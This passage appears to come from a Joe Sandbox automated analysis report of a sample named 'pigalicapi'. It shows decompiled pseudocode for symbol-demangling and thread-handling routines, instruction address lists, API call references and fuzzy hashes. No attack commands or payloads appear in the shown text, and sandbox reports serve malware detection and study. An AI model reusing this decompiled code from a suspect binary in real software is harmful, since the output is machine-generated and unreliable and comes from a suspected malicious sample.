                                                                                                                                                                                                                                                                                                        					if( *((char*)(__eax + 1)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        						goto L2;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					goto L9;
                                                                                                                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                                                                                                                        					asm("repe cmpsb");
                                                                                                                                                                                                                                                                                                        					_t142 = 0 | _t183 > 0x00000000;
                                                                                                                                                                                                                                                                                                        					_t168 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t142 != (_t88 & 0xffffff00 | _t183 > 0x00000000)) {
                                                                                                                                                                                                                                                                                                        						L9:
                                                                                                                                                                                                                                                                                                        						 *_t179 = _t131;
                                                                                                                                                                                                                                                                                                        						_v392 = _t149;
                                                                                                                                                                                                                                                                                                        						_t90 = strlen(??);
                                                                                                                                                                                                                                                                                                        						_v372 = _t131;
                                                                                                                                                                                                                                                                                                        						_v364 = 0x11;
                                                                                                                                                                                                                                                                                                        						_v360 = _t131;
                                                                                                                                                                                                                                                                                                        						_v352 = 0;
                                                                                                                                                                                                                                                                                                        						_v340 = 0;
                                                                                                                                                                                                                                                                                                        						_t143 = _t90;
                                                                                                                                                                                                                                                                                                        						_v368 = _t131 + _t90;
                                                                                                                                                                                                                                                                                                        						_v348 = _t143 + _t143;
                                                                                                                                                                                                                                                                                                        						_v336 = _t143;
                                                                                                                                                                                                                                                                                                        						_v332 = 0;
                                                                                                                                                                                                                                                                                                        						_v328 = 0;
                                                                                                                                                                                                                                                                                                        						_v324 = 0;
                                                                                                                                                                                                                                                                                                        						_t96 = E0040DB20(0x00000012 + (_t143 + _t143 + _t143 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        						_t99 = E0040DB20(0x00000012 + _t143 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        						_t150 = _v392;
                                                                                                                                                                                                                                                                                                        						_t181 = _t179 - _t96 - _t99;
                                                                                                                                                                                                                                                                                                        						_t191 = _t168 - 1;
                                                                                                                                                                                                                                                                                                        						_v356 =  &_v400;
                                                                                                                                                                                                                                                                                                        						_v344 =  &_v400;
                                                                                                                                                                                                                                                                                                        						if(_t191 == 0) {
                                                                                                                                                                                                                                                                                                        							_t144 = 0;
                                                                                                                                                                                                                                                                                                        							if(_t150 == 0x5f) {
                                                                                                                                                                                                                                                                                                        								_t150 =  *(_t131 + 1) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        								_v360 = _t131 + 1;
                                                                                                                                                                                                                                                                                                        								if(_t150 != 0x5a) {
                                                                                                                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_v360 = _t131 + 2;
                                                                                                                                                                                                                                                                                                        								_t135 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t144 = E00406810( &_v372, 1);
                                                                                                                                                                                                                                                                                                        								if((_v364 & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        									while(1) {
                                                                                                                                                                                                                                                                                                        										_t171 = _v360;
                                                                                                                                                                                                                                                                                                        										_t150 =  *_t171 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										if(_t150 != 0x2e) {
                                                                                                                                                                                                                                                                                                        											goto L21;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        										_t112 = _t171[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        										_t85 = _t112 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        										if(_t85 <= 0x19 || _t112 == 0x5f || _t112 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        											_t144 = E00405190(_t135, _t144);
                                                                                                                                                                                                                                                                                                        											continue;
                                                                                                                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                                                                                                                        											_t150 =  *_t171 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        											goto L21;
                                                                                                                                                                                                                                                                                                        										}
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L21;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        								_t150 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							L21:
                                                                                                                                                                                                                                                                                                        							_t102 = 0;
                                                                                                                                                                                                                                                                                                        							if(_t150 == 0 && _t144 != 0) {
                                                                                                                                                                                                                                                                                                        								_t133 =  &_v320;
                                                                                                                                                                                                                                                                                                        								_v64 = 0;
                                                                                                                                                                                                                                                                                                        								_v60 = 0;
                                                                                                                                                                                                                                                                                                        								_v48 = 0;
                                                                                                                                                                                                                                                                                                        								_v56 = _v384;
                                                                                                                                                                                                                                                                                                        								_v44 = 0;
                                                                                                                                                                                                                                                                                                        								_v36 = 0;
                                                                                                                                                                                                                                                                                                        								_v32 = 0;
                                                                                                                                                                                                                                                                                                        								_v52 = _v388;
                                                                                                                                                                                                                                                                                                        								_v40 = 0;
                                                                                                                                                                                                                                                                                                        								E004079F0(_t133, _t144, 0x11);
                                                                                                                                                                                                                                                                                                        								_t107 = _v64;
                                                                                                                                                                                                                                                                                                        								 *_t181 = _t133;
                                                                                                                                                                                                                                                                                                        								 *((char*)(_t176 + _t107 - 0x13c)) = 0;
                                                                                                                                                                                                                                                                                                        								_v404 = _v52;
                                                                                                                                                                                                                                                                                                        								_v408 = _t107;
                                                                                                                                                                                                                                                                                                        								_v56();
                                                                                                                                                                                                                                                                                                        								_t102 = 0 | _v40 == 0x00000000;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							return _t102;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						if(_t191 < 0 || _t168 > 3) {
                                                                                                                                                                                                                                                                                                        							_t144 = E00405ED0( &_v372);
                                                                                                                                                                                                                                                                                                        							_t150 =  *_v360 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                                                                                                                        							_t166 = _t131 + 0xb;
                                                                                                                                                                                                                                                                                                        							_v360 = _t166;
                                                                                                                                                                                                                                                                                                        							if( *((char*)(_t131 + 0xb)) != 0x5f ||  *((char*)(_t131 + 0xc)) != 0x5a) {
                                                                                                                                                                                                                                                                                                        								 *_t181 = _t166;
                                                                                                                                                                                                                                                                                                        								_t136 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t146 = E00404FF0( &_v372, strlen(??), _t166);
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_v360 = _t131 + 0xd;
                                                                                                                                                                                                                                                                                                        								_t136 =  &_v372;
                                                                                                                                                                                                                                                                                                        								_t146 = E00406810( &_v372, 0);
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							 *_t181 = 0;
                                                                                                                                                                                                                                                                                                        							_t124 = E00404F90(_t136, _t146, (0 | _t168 != 0x00000002) + 0x42);
                                                                                                                                                                                                                                                                                                        							_t137 = _v360;
                                                                                                                                                                                                                                                                                                        							 *_t181 = _t137;
                                                                                                                                                                                                                                                                                                        							_v392 = _t124;
                                                                                                                                                                                                                                                                                                        							_t125 = strlen(??);
                                                                                                                                                                                                                                                                                                        							_t144 = _v392;
                                                                                                                                                                                                                                                                                                        							_t138 = _t137 + _t125;
                                                                                                                                                                                                                                                                                                        							_v360 = _t138;
                                                                                                                                                                                                                                                                                                        							_t150 =  *_t138 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L21;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					_t128 =  *(_t131 + 8) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					if(_t128 == 0x2e || _t128 == 0x5f) {
                                                                                                                                                                                                                                                                                                        						L5:
                                                                                                                                                                                                                                                                                                        						_t129 =  *(_t131 + 9) & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						_t10 = _t129 == 0x49;
                                                                                                                                                                                                                                                                                                        						_t147 = _t142 & 0xffffff00 | _t10;
                                                                                                                                                                                                                                                                                                        						if(_t10 == 0) {
                                                                                                                                                                                                                                                                                                        							L7:
                                                                                                                                                                                                                                                                                                        							_t168 = 0;
                                                                                                                                                                                                                                                                                                        							if( *((char*)(_t131 + 0xa)) == 0x5f) {
                                                                                                                                                                                                                                                                                                        								_t168 = (_t147 << 0x1f >> 0x1f) + 3;
                                                                                                                                                                                                                                                                                                        							}
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						_t168 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t129 != 0x44) {
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L7;
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						if(_t128 != 0x24) {
                                                                                                                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        			}
































































                                                                                                                                                                                                                                                                                                        0x0040c545
                                                                                                                                                                                                                                                                                                        0x0040c551
                                                                                                                                                                                                                                                                                                        0x0040c556
                                                                                                                                                                                                                                                                                                        0x0040c558
                                                                                                                                                                                                                                                                                                        0x0040c55e
                                                                                                                                                                                                                                                                                                        0x0040c564
                                                                                                                                                                                                                                                                                                        0x0040c567
                                                                                                                                                                                                                                                                                                        0x0040c56d
                                                                                                                                                                                                                                                                                                        0x0040c570
                                                                                                                                                                                                                                                                                                        0x0040c714
                                                                                                                                                                                                                                                                                                        0x0040c719
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c576
                                                                                                                                                                                                                                                                                                        0x0040c576
                                                                                                                                                                                                                                                                                                        0x0040c582
                                                                                                                                                                                                                                                                                                        0x0040c584
                                                                                                                                                                                                                                                                                                        0x0040c58a
                                                                                                                                                                                                                                                                                                        0x0040c58e
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c0
                                                                                                                                                                                                                                                                                                        0x0040c5c3
                                                                                                                                                                                                                                                                                                        0x0040c5c9
                                                                                                                                                                                                                                                                                                        0x0040c5ce
                                                                                                                                                                                                                                                                                                        0x0040c5d4
                                                                                                                                                                                                                                                                                                        0x0040c5de
                                                                                                                                                                                                                                                                                                        0x0040c5e4
                                                                                                                                                                                                                                                                                                        0x0040c5ee
                                                                                                                                                                                                                                                                                                        0x0040c5f8
                                                                                                                                                                                                                                                                                                        0x0040c5fd
                                                                                                                                                                                                                                                                                                        0x0040c606
                                                                                                                                                                                                                                                                                                        0x0040c619
                                                                                                                                                                                                                                                                                                        0x0040c61f
                                                                                                                                                                                                                                                                                                        0x0040c629
                                                                                                                                                                                                                                                                                                        0x0040c633
                                                                                                                                                                                                                                                                                                        0x0040c63d
                                                                                                                                                                                                                                                                                                        0x0040c652
                                                                                                                                                                                                                                                                                                        0x0040c657
                                                                                                                                                                                                                                                                                                        0x0040c65d
                                                                                                                                                                                                                                                                                                        0x0040c65f
                                                                                                                                                                                                                                                                                                        0x0040c666
                                                                                                                                                                                                                                                                                                        0x0040c66c
                                                                                                                                                                                                                                                                                                        0x0040c672
                                                                                                                                                                                                                                                                                                        0x0040c725
                                                                                                                                                                                                                                                                                                        0x0040c72a
                                                                                                                                                                                                                                                                                                        0x0040c7f0
                                                                                                                                                                                                                                                                                                        0x0040c7f7
                                                                                                                                                                                                                                                                                                        0x0040c800
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c80e
                                                                                                                                                                                                                                                                                                        0x0040c814
                                                                                                                                                                                                                                                                                                        0x0040c828
                                                                                                                                                                                                                                                                                                        0x0040c82a
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c851
                                                                                                                                                                                                                                                                                                        0x0040c857
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c85d
                                                                                                                                                                                                                                                                                                        0x0040c861
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x0040c849
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c874
                                                                                                                                                                                                                                                                                                        0x0040c867
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c84b
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c832
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c730
                                                                                                                                                                                                                                                                                                        0x0040c734
                                                                                                                                                                                                                                                                                                        0x0040c740
                                                                                                                                                                                                                                                                                                        0x0040c74b
                                                                                                                                                                                                                                                                                                        0x0040c752
                                                                                                                                                                                                                                                                                                        0x0040c756
                                                                                                                                                                                                                                                                                                        0x0040c75d
                                                                                                                                                                                                                                                                                                        0x0040c766
                                                                                                                                                                                                                                                                                                        0x0040c76d
                                                                                                                                                                                                                                                                                                        0x0040c774
                                                                                                                                                                                                                                                                                                        0x0040c77b
                                                                                                                                                                                                                                                                                                        0x0040c780
                                                                                                                                                                                                                                                                                                        0x0040c787
                                                                                                                                                                                                                                                                                                        0x0040c78c
                                                                                                                                                                                                                                                                                                        0x0040c792
                                                                                                                                                                                                                                                                                                        0x0040c795
                                                                                                                                                                                                                                                                                                        0x0040c79d
                                                                                                                                                                                                                                                                                                        0x0040c7a1
                                                                                                                                                                                                                                                                                                        0x0040c7a5
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7af
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c7b9
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c7cb
                                                                                                                                                                                                                                                                                                        0x0040c7d3
                                                                                                                                                                                                                                                                                                        0x0040c687
                                                                                                                                                                                                                                                                                                        0x0040c68b
                                                                                                                                                                                                                                                                                                        0x0040c68e
                                                                                                                                                                                                                                                                                                        0x0040c694
                                                                                                                                                                                                                                                                                                        0x0040c6a0
                                                                                                                                                                                                                                                                                                        0x0040c6a3
                                                                                                                                                                                                                                                                                                        0x0040c6b9
                                                                                                                                                                                                                                                                                                        0x0040c880
                                                                                                                                                                                                                                                                                                        0x0040c885
                                                                                                                                                                                                                                                                                                        0x0040c88b
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c898
                                                                                                                                                                                                                                                                                                        0x0040c6c8
                                                                                                                                                                                                                                                                                                        0x0040c6cf
                                                                                                                                                                                                                                                                                                        0x0040c6d4
                                                                                                                                                                                                                                                                                                        0x0040c6da
                                                                                                                                                                                                                                                                                                        0x0040c6dd
                                                                                                                                                                                                                                                                                                        0x0040c6e3
                                                                                                                                                                                                                                                                                                        0x0040c6e8
                                                                                                                                                                                                                                                                                                        0x0040c6ee
                                                                                                                                                                                                                                                                                                        0x0040c6f0
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x0040c6f6
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c678
                                                                                                                                                                                                                                                                                                        0x0040c590
                                                                                                                                                                                                                                                                                                        0x0040c596
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a0
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a6
                                                                                                                                                                                                                                                                                                        0x0040c5a9
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b1
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x0040c7e8
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c5b7
                                                                                                                                                                                                                                                                                                        0x0040c5ab
                                                                                                                                                                                                                                                                                                        0x0040c5af
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c700
                                                                                                                                                                                                                                                                                                        0x0040c702
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                                                                                                                        0x0040c708
                                                                                                                                                                                                                                                                                                        0x0040c596

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: strlen
                                                                                                                                                                                                                                                                                                        • String ID: Z$Z__$_$_$_GLOBAL_
                                                                                                                                                                                                                                                                                                        • API String ID: 39653677-4292778781
                                                                                                                                                                                                                                                                                                        • Opcode ID: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
                                                                                                                                                                                                                                                                                                        • Instruction ID: a41b7c460a24ac64f23146913b44c01de2d1fb22a8724b68d938b925d51e36d8
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0ad0a61377d16953e720fc486ce5b331837087ab9875d8e2a4921e5e519b7121
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79513AB5D046299BDB20DF69C8843DEBBF1AF49304F4481AAD448BB381D7395A898F94
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • TlsSetValue.KERNEL32 ref: 00410CEE
                                                                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00410CF7
                                                                                                                                                                                                                                                                                                        • _setjmp3.MSVCRT ref: 00410D1F
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32 ref: 00410D97
                                                                                                                                                                                                                                                                                                        • _endthreadex.MSVCRT(00000000,00000000), ref: 00410E04
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00410280: fprintf.MSVCRT ref: 004102C0
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 00000001.00000002.630678396.0000000000402000.00000080.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630393868.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.630561595.0000000000401000.00000020.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631400390.000000000041F000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631534886.0000000000422000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631640213.0000000000423000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631857089.000000000042B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.631957410.000000000042E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 00000001.00000002.632483760.0000000000444000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_400000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCurrentHandleThreadValue_endthreadex_setjmp3fprintf
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 2387900098-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
                                                                                                                                                                                                                                                                                                        • Instruction ID: 069eecf464360b48a19cab1872b724955f5dbd0cfa50671f5b9cb90f7b6cbb53
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3231c7298ae24cf4057dd50695aea02e6fd702408afff17890ca73ed8ac27e02
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6181FBB0604305DFD710EF66D58469ABBF0BF44344F45882EE9858B352D7B8E9C2CB9A
                                                                                                                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                        C-Code - Quality: 68%
                                                                                                                                                                                                                                                                                                        			E0040C6FC(void* __eax, signed char* __ebx, signed int __ecx, signed int __edx) {
                                                                                                                                                                                                                                                                                                        				signed int _t81;
                                                                                                                                                                                                                                                                                                        				signed int _t82;
                                                                                                                                                                                                                                                                                                        				void* _t91;
                                                                                                                                                                                                                                                                                                        				signed int _t94;
                                                                                                                                                                                                                                                                                                        				signed char* _t99;
                                                                                                                                                                                                                                                                                                        				signed int _t104;
                                                                                                                                                                                                                                                                                                        				signed int _t116;
                                                                                                                                                                                                                                                                                                        				int _t117;
                                                                                                                                                                                                                                                                                                        				signed char* _t120;
                                                                                                                                                                                                                                                                                                        				signed char* _t122;
                                                                                                                                                                                                                                                                                                        				signed char* _t126;
                                                                                                                                                                                                                                                                                                        				signed char* _t127;
                                                                                                                                                                                                                                                                                                        				signed int _t130;
                                                                                                                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                                                                                                                        				void* _t134;
                                                                                                                                                                                                                                                                                                        				signed int _t135;
                                                                                                                                                                                                                                                                                                        				signed int _t136;
                                                                                                                                                                                                                                                                                                        				signed char* _t150;
                                                                                                                                                                                                                                                                                                        				void* _t151;
                                                                                                                                                                                                                                                                                                        				signed char* _t156;
                                                                                                                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                                                                                                                        				signed char** _t159;
                                                                                                                                                                                                                                                                                                        				void* _t160;
                                                                                                                                                                                                                                                                                                        				signed char** _t161;
                                                                                                                                                                                                                                                                                                        				void* _t167;
                                                                                                                                                                                                                                                                                                        
                                                                                                                                                                                                                                                                                                        				_t135 = __edx;
                                                                                                                                                                                                                                                                                                        				_t120 = __ebx;
                                                                                                                                                                                                                                                                                                        				if(__al == 0x24) {
                                                                                                                                                                                                                                                                                                        					_t81 = __ebx[9] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        					_t3 = _t81 == 0x49;
                                                                                                                                                                                                                                                                                                        					_t130 = __ecx & 0xffffff00 | _t3;
                                                                                                                                                                                                                                                                                                        					if(_t3 == 0) {
                                                                                                                                                                                                                                                                                                        						L3:
                                                                                                                                                                                                                                                                                                        						_t151 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t120[0xa] == 0x5f) {
                                                                                                                                                                                                                                                                                                        							_t151 = (_t130 << 0x1f >> 0x1f) + 3;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                                                                                                                        						_t151 = 0;
                                                                                                                                                                                                                                                                                                        						if(_t81 == 0x44) {
                                                                                                                                                                                                                                                                                                        							goto L3;
                                                                                                                                                                                                                                                                                                        						}
                                                                                                                                                                                                                                                                                                        					}
                                                                                                                                                                                                                                                                                                        					L31:
                                                                                                                                                                                                                                                                                                        				}
                                                                                                                                                                                                                                                                                                        				 *_t159 = _t120;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x184) = _t135;
                                                                                                                                                                                                                                                                                                        				_t82 = strlen(??);
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x170) = _t120;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x168) = 0x11;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x164) = _t120;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x15c) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x150) = 0;
                                                                                                                                                                                                                                                                                                        				_t131 = _t82;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x16c) =  &(_t120[_t82]);
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t157 - 0x158)) = _t131 + _t131;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x14c) = _t131;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x148) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x144) = 0;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x140) = 0;
                                                                                                                                                                                                                                                                                                        				_t160 = _t159 - E0040DB20(0x00000012 + (_t131 + _t131 + _t131 * 0x00000004) * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t91 = E0040DB20(0x00000012 + _t131 * 0x00000004 & 0xfffffff0);
                                                                                                                                                                                                                                                                                                        				_t136 =  *(_t157 - 0x184);
                                                                                                                                                                                                                                                                                                        				_t161 = _t160 - _t91;
                                                                                                                                                                                                                                                                                                        				_t167 = _t151 - 1;
                                                                                                                                                                                                                                                                                                        				 *((intOrPtr*)(_t157 - 0x160)) = _t160 + 0xc;
                                                                                                                                                                                                                                                                                                        				 *(_t157 - 0x154) =  &(_t161[3]);
                                                                                                                                                                                                                                                                                                        				if(_t167 == 0) {
                                                                                                                                                                                                                                                                                                        					_t132 = 0;
                                                                                                                                                                                                                                                                                                        					if(_t136 == 0x5f) {
                                                                                                                                                                                                                                                                                                        						_t136 = _t120[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        						 *(_t157 - 0x164) =  &(_t120[1]);
                                                                                                                                                                                                                                                                                                        						if(_t136 == 0x5a) {
                                                                                                                                                                                                                                                                                                        							 *(_t157 - 0x164) =  &(_t120[2]);
                                                                                                                                                                                                                                                                                                        							_t124 = _t157 - 0x170;
                                                                                                                                                                                                                                                                                                        							_t132 = E00406810(_t157 - 0x170, 1);
                                                                                                                                                                                                                                                                                                        							if(( *(_t157 - 0x168) & 0x00000001) != 0) {
                                                                                                                                                                                                                                                                                                        								while(1) {
                                                                                                                                                                                                                                                                                                        									_t156 =  *(_t157 - 0x164);
                                                                                                                                                                                                                                                                                                        									_t136 =  *_t156 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									if(_t136 != 0x2e) {
                                                                                                                                                                                                                                                                                                        										goto L15;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									_t104 = _t156[1] & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									_t77 = _t104 - 0x61; // -7
                                                                                                                                                                                                                                                                                                        									if(_t77 <= 0x19 || _t104 == 0x5f || _t104 - 0x30 <= 9) {
                                                                                                                                                                                                                                                                                                        										_t132 = E00405190(_t124, _t132);
                                                                                                                                                                                                                                                                                                        										continue;
                                                                                                                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                                                                                                                        										_t136 =  *_t156 & 0x000000ff;
                                                                                                                                                                                                                                                                                                        									}
                                                                                                                                                                                                                                                                                                        									goto L15;
                                                                                                                                                                                                                                                                                                        								}
                                                                                                                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                                                                                                                        								_t136 =  *( *(_t157 - 0x164)) & 0x000000ff;
